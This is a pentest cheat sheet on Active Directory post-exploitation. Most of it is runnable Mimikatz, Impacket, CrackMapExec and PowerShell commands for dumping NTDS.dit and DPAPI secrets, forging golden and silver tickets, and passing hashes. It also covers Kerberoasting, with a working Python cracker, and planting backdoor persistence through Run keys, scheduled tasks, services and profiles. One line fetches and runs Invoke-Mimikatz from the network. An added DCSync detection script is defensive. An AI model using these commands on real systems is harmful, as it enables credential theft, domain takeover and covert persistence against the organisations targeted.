# Post exploitation techniques

**DC SHADOW**

`# DCShadow is a post-compromise attack: the compromised host registers itself as a rogue domain controller`\
`# and pushes attribute changes (here a user's description, with forged replication metadata) to the real DCs through normal replication`\
`# It needs SYSTEM on the host (terminal 1, which runs the fake DC) and a domain admin account (terminal 2, which triggers the push)`\
`# You can attack with Mimikatz`\
\
`# Terminal 1 (runas)`\
`mimikatz # !+`\
`mimikatz # !processtoken`\
`mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42`\
\
`# Terminal 2 (runas)`\
`mimikatz # lsadump::dcshadow /push`\
\
`# You can check the result through repadmin on the DC (it shows the replication metadata of the object)`\
`repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"`

**NTDS database**

`# Default location of the NTDS database on a domain controller`\
`C:\Windows\NTDS\NTDS.dit`\
\
`# Step 1 → Find a way to get NTDS.dit and the SYSTEM hive (its boot key is needed to decrypt the hashes)`\
`# Step 2 → Crack/Analyze offline`\
\
**Local Extraction** \
**VSSadmin** \
`# Retrieval via vssadmin (needs local admin on the DC)`\
`# Create a Volume Shadow Copy (note the shadow copy number it prints; vssadmin list shadows shows existing ones)`\
`C:\Windows\system32> vssadmin create shadow /for=C:`\
\
`# Retrieve NTDS.dit from the copy`\
`C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit c:\Extract\ntds.dit`\
\
`# Get the SYSTEM hive (either export it from the live registry or copy it from the shadow)`\
`C:\Windows\system32> reg SAVE HKLM\SYSTEM c:\Extract\SYS`\
`C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM c:\Extract\SYSTEM`\
\
`# Clean up`\
`C:\Windows\system32> vssadmin delete shadows /shadow={uuid}`\
\
`# Trick if you are on a semi-interactive shell`\
`# The /quiet option suppresses the prompt`\
`# Useful for deletion (which asks for confirmation)`\
`vssadmin delete shadows /shadow={uuid} /quiet`\
\
**ntdsutil tool** \
`# ntdsutil is a built-in tool used to manage AD`\
`# You can abuse its IFM (Install From Media) mode to get a consistent copy of ntds.dit together with the SYSTEM hive`\
`# Output lands in C:\ntdsutil\Active Directory\ntds.dit and C:\ntdsutil\registry\SYSTEM`\
`ntdsutil`\
`activate instance ntds`\
`ifm`\
`create full C:\ntdsutil`\
`quit`\
`quit`\
\
**DC Sync / Mimikatz** \
`# DCSync is a less noisy way to extract credentials than copying NTDS.dit: nothing is written to disk on the DC`\
`# It asks a DC for the data over the DRS (Directory Replication Service) RPC interface, exactly as another DC would`\
`# It requires the replication rights (Replicating Directory Changes / Changes All), which Domain Admins hold by default`\
`# The DC still logs event 4662 with the replication GUIDs when auditing of directory service access is enabled`\
\
`# Classic`\
`mimikatz # lsadump::dcsync /domain:domain.lan /all /csv`\
\
`# Specific user`\
`mimikatz # lsadump::dcsync /domain:domain.lan /user:test`\
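
DCSync is quiet on disk but not in the Security log: when directory service access auditing is on, the DC writes event 4662 whose `Properties` field carries the control-access GUIDs the caller exercised, and only DCs (plus sync accounts such as Azure AD Connect's MSOL_*) should ever hold DS-Replication-Get-Changes-All. The check below is an added example, not code from this page or from any tool listed on it; the three replication GUIDs are the real ones, while the sample events, host names and the unrelated property GUID in the last event are constructed, and the event layout is reduced to the EventData field names.

```python
import re

# Control-access rights a DCSync caller must hold, as they appear in the "Properties" of event 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def dcsync_alerts(events, domain_controllers, allowlist=()):
    """Return (account, dc, rights) for 4662 events where a non-DC principal used replication rights.

    events: dicts keyed by the EventData field names of Security event 4662;
    domain_controllers: sAMAccountNames of the DCs (e.g. "DC01$"), whose own
    replication is expected; allowlist: other accounts allowed to replicate.
    """
    expected = {n.upper() for n in domain_controllers} | {n.upper() for n in allowlist}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = sorted(
            REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(ev.get("Properties", ""))
            if g.lower() in REPLICATION_RIGHTS
        )
        if not rights:
            continue  # some other directory access audit, not a replication request
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in expected:
            continue
        alerts.append((subject, ev.get("Computer", ""), rights))
    return alerts


# Constructed sample events (not real logs): DC-to-DC replication, an allowlisted sync
# account, a DCSync from a user account, and an unrelated 4662 on the same object.
_REPL_PROPS = ("Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
               "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
_DOMAIN_OBJ = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # domainDNS object type
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.foo.local", "SubjectUserName": "DC02$",
     "ObjectType": _DOMAIN_OBJ, "Properties": _REPL_PROPS},
    {"EventID": 4662, "Computer": "DC01.foo.local", "SubjectUserName": "MSOL_1a2b3c4d5e6f",
     "ObjectType": _DOMAIN_OBJ, "Properties": _REPL_PROPS},
    {"EventID": 4662, "Computer": "DC01.foo.local", "SubjectUserName": "jdoe",
     "ObjectType": _DOMAIN_OBJ, "Properties": _REPL_PROPS},
    {"EventID": 4662, "Computer": "DC01.foo.local", "SubjectUserName": "jdoe",
     "ObjectType": _DOMAIN_OBJ,
     "Properties": "Read Property\n\t{bf967a9c-0de6-11d0-a285-00aa003049e2}"},
]
DOMAIN_CONTROLLERS = ["DC01$", "DC02$"]
SYNC_ACCOUNTS = ["MSOL_1a2b3c4d5e6f"]


def sample_alerts():
    return dcsync_alerts(SAMPLE_EVENTS, DOMAIN_CONTROLLERS, SYNC_ACCOUNTS)


if __name__ == "__main__":
    for account, dc, rights in sample_alerts():
        print(f"DCSync-like replication by {account} on {dc}: {', '.join(rights)}")
```

From the attacker's side the same logic tells you what to expect: running DCSync from a user account, even a domain admin, is the event pattern a mature SOC alerts on, while running it with a DC's computer account (as in the secretsdump example further down) blends into normal replication.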
\
**PowerSploit** \
`# PowerSploit contains a script using the volume shadow copy service`\
`Import-Module .\VolumeShadowCopyTools.ps1`\
`New-VolumeShadowCopy -Volume C:\`\
`Get-VolumeShadowCopy`\
\
`# Also possible through a meterpreter session`\
`powershell_shell`\
`New-VolumeShadowCopy -Volume C:\`\
`Get-VolumeShadowCopy`\
\
**Invoke-DCSync** \
`# Powershell script`\
`# Leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz`\
`Invoke-DCSync`\
\
`# Get other format (user:id:lm:ntlm)`\
`Invoke-DCSync -PWDumpFormat`\
`# It is also possible through a meterpreter session`\
\
**Nishang**

`# Nishang is a post-exploitation framework allowing an attacker to perform attacks`\
`# You can use the Copy-VSS script to get NTDS.dit, SAM and SYSTEM files`\
`Import-Module .\Copy-VSS.ps1`\
`Copy-VSS`\
`Copy-VSS -DestinationDir C:\ShadowCopy\`\
\
`# You can also use them through a meterpreter session by loading the powershell extension`\
`load powershell`\
`powershell_import /root/Copy-VSS.ps1`\
`powershell_execute Copy-VSS`\
\
`# Also possible to establish a direct connection`\
`powershell_shell`\
`PS > Copy-VSS`\
`PS > Copy-VSS -DestinationDir C:\ninja`\
\
**Remote Extraction** \
**CrackMapExec** \
`# drsuapi = DCSync over the replication interface (--ntds vss uses a shadow copy instead)`\
`crackmapexec xxx.xxx.xxx.xxx -u login -p password -d domain --ntds drsuapi`\
\
**WMI - Remote**\
`# It is possible to remotely extract the NTDS database using WMI and VSSADMIN`\
`# C:\temp must already exist on the DC, and the shadow copy number (1 here) is the one returned by the first command`\
`wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"`\
`wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"`\
`wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"`\
\
\
**Impacket** \
`$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\
\
`$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\
\
**NTDS Extraction and analysis** \
`# Impacket provides a useful script to decrypt the copied files offline (the target must be LOCAL for offline parsing)`\
`impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL`\
\
`# Also possible to dump it remotely with the DC's computer account and its NT hash (it holds replication rights)`\
`impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1`\
\
`# Extraction is also possible using NTDSDumpEx`\
`NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive`\
\
`# Or adXtract`\
`./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab`\
\
**Empire** \
`# Empire has 2 modules you can use to retrieve hashes through DCSync`\
`usemodule credentials/mimikatz/dcsync_hashdump`\
`usemodule credentials/mimikatz/dcsync`

**Ticket generation from Linux** \
`# Generate a golden ticket (impacket ticketer.py writes <user>.ccache); a kekeo/mimikatz .kirbi can be converted to ccache with ticketConverter.py`\
`$ ticketer.py -nthash <krbtgt NT hash> -domain-sid <domain SID> -domain <domain> <user>`\
\
`# Point the Kerberos credential cache variable at the ticket`\
`$ export KRB5CCNAME=/tmp/ticket.ccache`\
`$ klist`\
\
`# Use the ticket (-k: Kerberos auth from the cache, -no-pass: do not prompt for a password)`\
`$ /impacket/examples/psexec.py -k -no-pass -debug DOMAIN/user@host`\
\
`# Dump NTDS`\
`$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss`\
\
**Golden Ticket** \
`# Golden Ticket: what you need`\
`> Administrator account name (Administrateur)`\
`> Fully qualified domain name (domain.local)`\
`> Domain SID (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user, without the trailing RID]`\
`> NTLM hash of the krbtgt account (6194bd1a5bf3ecd542e8aac9860bddf0)`\
\
`# Dump the krbtgt hash (on a DC, with admin rights)`\
`mimikatz # privilege::debug`\
`mimikatz # lsadump::lsa /inject /name:krbtgt`\
\
`mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt`\
\
`Use:`\
`mimikatz # kerberos::ptt domain.local.kirbi`\
`mimikatz # kerberos::list`\
\
`# Resource`\
`https://twitter.com/mpgn_x64/status/1241688547037532161`\
\
`# Golden ticket injected but still access denied? Pin the DC used for Kerberos, then retry (from an elevated cmd)`\
`> mimikatz kerberos::golden`\
`> klist add_bind <DOMAIN> <DC>`\
`> psexec \\dc\ cmd`\
\
**Playing with tickets on Windows** \
`# Current logon sessions and their credentials`\
`mimikatz # sekurlsa::logonpasswords`\
\
`# Kerberoasting: request a service ticket (TGS) for an SPN and crack it offline`\
`# Dump SPNs`\
`PS C:\> Find-PSServiceAccounts -DumpSPN`\
`Discovering service account SPNs in the AD Domain foo.local`\
`svcSQLServ/pc1.foo.local:1433`\
\
`# Download Mimikatz`\
`PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')`\
`PS C:\> Invoke-Mimikatz`\
`mimikatz(powershell) # sekurlsa::logonpasswords`\
`ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`\
`# 0x5 is ACCESS_DENIED: sekurlsa needs an elevated (admin/SYSTEM) PowerShell; requesting and exporting your own tickets does not`\
\
`# List active tickets or purge them`\
`PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'`\
`PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'`\
`PS C:\> klist`\
\
`# Request a ticket for the SPN (any domain user can do this)`\
`PS C:\> Add-Type -AssemblyName System.IdentityModel`\
`PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"`\
\
`# Export the tickets (.kirbi files written to the current directory)`\
`mimikatz # kerberos::list /export`\
\
`# Crack the ticket offline`\
`python tgsrepcrack.py wordlist.txt ticket.kirbi`
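
What tgsrepcrack.py actually does with the exported ticket: the service ticket's enc-part is RC4-HMAC (etype 23) under the service account's NT hash, so for each wordlist candidate it computes NT = MD4(UTF-16LE(password)), K1 = HMAC-MD5(NT, usage 2), K3 = HMAC-MD5(K1, checksum), decrypts the body with RC4(K3) and accepts the candidate when HMAC-MD5(K1, plaintext) equals the 16-byte checksum that leads the ciphertext (RFC 4757). The block below is an added example reimplementing that check, not the page's or tgsrepcrack's own code: the ticket is constructed in the block with a fixed confounder and a placeholder plaintext, where a real .kirbi carries 8 random confounder bytes and a DER-encoded EncTicketPart, and the password and wordlist are made up. MD4 is implemented by hand because hashlib often lacks it under OpenSSL 3.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; hashlib's md4 is often unavailable under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    rounds = (  # (function, constant, shift amounts, message-word order) for each round
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + X[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step works on (d, a, b, c)
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


TICKET_USAGE = 2  # RFC 4120 key usage number for the EncTicketPart inside a TGS-REP


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: edata = checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    return checksum + rc4(hmac_md5(k1, checksum), data)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Return the plaintext (confounder stripped) when the checksum verifies, else None."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum, body = edata[:16], edata[16:]
    data = rc4(hmac_md5(k1, checksum), body)
    if not hmac.compare_digest(hmac_md5(k1, data), checksum):
        return None  # wrong key: the MAC over the decrypted bytes does not match
    return data[8:]


def crack_tgs(edata: bytes, wordlist):
    """The tgsrepcrack loop: hash each candidate and try it as the ticket key."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), TICKET_USAGE, edata) is not None:
            return candidate
    return None


# Constructed sample: a ticket for a made-up SPN encrypted under the NT hash of "Summer2017!"
# with a fixed confounder (a real ticket uses 8 random bytes and a DER-encoded EncTicketPart).
SAMPLE_PLAINTEXT = b"constructed EncTicketPart for svcSQLServ/pc1.foo.local"
SAMPLE_EDATA = rc4_hmac_encrypt(nt_hash("Summer2017!"), TICKET_USAGE, SAMPLE_PLAINTEXT, bytes(range(8)))
SAMPLE_WORDLIST = ["password", "Password123", "Welcome1", "Summer2017!", "Autumn2017!"]

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("recovered service account password:", crack_tgs(SAMPLE_EDATA, SAMPLE_WORDLIST))
```

Two things follow from the math: each guess costs one MD4 plus three HMAC-MD5 and one RC4, so RC4 tickets crack at GPU speed, and the whole check falls apart for AES tickets (etypes 17/18), whose key comes from PBKDF2 with 4096 iterations over the salted password; if `kerberos::list` shows AES tickets only, the service account is either configured AES-only or you requested the wrong etype, and cracking is far slower.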

**Tips** \
`# Getting passwords from browser process memory: dump the process, then grep the dump for form field names`\
`procdump.exe -ma firefox_pid`\
`strings.exe firefox.dmp | findstr /i "Passwd="`\
\
**Scavenger** \
`# Scavenger is built on top of CrackMapExec and automates the hunt for sensitive files`\
`# and information during an internal pentest`\
`python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local`\
\
`$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite`\
\
**WinSCP** \
`# WinSCP stores saved session passwords in the registry (only obfuscated, not encrypted) unless a master password is set`\
`# You can query the keys manually`\
`reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2"`\
`reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\username@ip"`\
\
`# Then recover the password with the following binary`\
`https://github.com/anoopengineer/winscppasswd/releases`\
`.\winscppasswd ip user`\
\
`# Automation using CrackMapExec`\
`# The invoke_sessiongopher module recovers saved sessions for PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP`\
`crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher`\
\
**Snaffler**\
`https://github.com/SnaffCon/Snaffler`\
\
`# Snaffler automates hunting for interesting files on Windows domains: it enumerates domain computers,`\
`# their network shares and the files on them, and matches names and contents against its rules`\
\
`snaffler.exe -s -o snaffler.log`\
\
`-o Enables outputting results to a file. You probably want this if you're not using -s. e.g. -o C:\users\thing\snaffler.log`\
\
`-s Enables outputting results to stdout as soon as they're found. You probably want this if you're not using -o.`\
\
`-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug`\
\
`-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.`\
\
`-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.`\
\
`-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.`\
\
`-d Domain to search for computers to search for shares on to search for files in. Easy.`\
\
`-c Domain controller to query for the list of domain computers.`\
\
`-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.`\
\
`-j How many bytes of context either side of found strings in files to show, e.g. -j 200`\
\
`-z Path to a config file that defines all of the above, and much more (see the Snaffler README). Give it -z generate to generate a sample config file called .\default.toml.`\
\
\
**DonPAPI**\
`https://github.com/login-securite/DonPAPI`\
`# Dumps relevant secrets from compromised targets without triggering AV`\
`# With a user password (or NT hash), or the domain backup key (PVK), it can unprotect the users' DPAPI secrets`\
\
`# Currently gathered info`\
`# - Windows credentials (Taskscheduled credentials & a lot more)`\
`# - Windows Vaults`\
`# - Windows RDP credentials`\
`# - AdConnect (still require a manual operation)`\
`# - Wifi key`\
`# - Internet Explorer credentials`\
`# - Chrome cookies & credentials`\
`# - Firefox cookies & credentials`\
`# - VNC passwords`\
`# - mRemoteNG password (with default config)`\
\
`# Classic launch`\
`DonPAPI.py domain/user:passw0rd@target`\
\
`# Using hash`\
`DonPAPI.py --hashes <LM>:<NT> domain/user@target`\
\
`# Using Kerberos or local auth`\
`DonPAPI.py -k domain/user@target`\
`DonPAPI.py -local_auth user@target`\
\
`# If user has LAPS reading privilege`\
`DonPAPI.py -laps domain/user:passw0rd@target`\
\
`# If you are domain admin, you can dump the domain backup key using impacket`\
`# Then you can use the PVK (backup key) to dump all users secrets`\
`dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip`\
`python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list`

**PERSISTENCE**

**Resources** \
`https://rastamouse.me/2018/03/a-view-of-persistence/`\
\
**Userland & Elevated** \
`# Userland techniques`\
\
`# HKCU`\
`# Create a REG_SZ value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run (other autorun keys such as RunOnce exist).`\
`Value name: Backdoor`\
`Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe`\
\
`# Start-up`\
`# Create a batch script in the user startup folder.`\
`PS C:\> gc "C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat"`\
`start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe`\
\
`# Scheduled Tasks`\
`PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"`\
`PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"`\
`PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"`\
`PS C:\> $S = New-ScheduledTaskSettingsSet`\
`PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\
`PS C:\> Register-ScheduledTask Backdoor -InputObject $D`\
\
`# Powershell profiles`\
`# You can backdoor the powershell profile`\
`PS C:\> Test-Path $profile`\
`False`\
\
`PS C:\> New-Item -Path $profile -Type File -Force`\
\
`Directory: C:\Users\Rasta\Documents\WindowsPowerShell`\
\
`Mode LastWriteTime Length Name`\
`---- ------------- ------ ----`\
`-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1`\
\
`PS C:\> $string = 'Start-Process "cmd.exe"'`\
`PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append`\
\
`# Elevated techniques`\
\
`# HKLM`\
`# Similar to HKCU: create a REG_SZ value in HKLM\Software\Microsoft\Windows\CurrentVersion\Run (runs for every user at logon)`\
`Value name: Backdoor`\
`Value data: C:\Windows\Temp\backdoor.exe`\
\
`# Services`\
`# Create a service that will start automatically or on-demand.`\
`PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."`\
\
`# Scheduled Tasks`\
`PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"`\
`PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am`\
`PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest`\
`PS C:\> $S = New-ScheduledTaskSettingsSet`\
`PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\
`PS C:\> Register-ScheduledTask Backdoor -InputObject $D`\
\
**Maintaining Privilege** \
`# Steal passwords and use them with runas`\
`runas /netonly /user:FS01\Administrator cmd`\
\
`# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.`\
`# Both domain accounts and local accounts can work.`\
`mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt`\
\
`# Adding new local users can be a method to get back into machines`\
`# Administrators local group is a solution, but you can also use the following groups`\
`Remote Desktop Users`\
`Remote Management Users`\
`Backup Operators`\
\
`# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.`\
`mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt`\
\
`# Golden tickets can be used to forge access to any service in the domain.`\
`mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt`

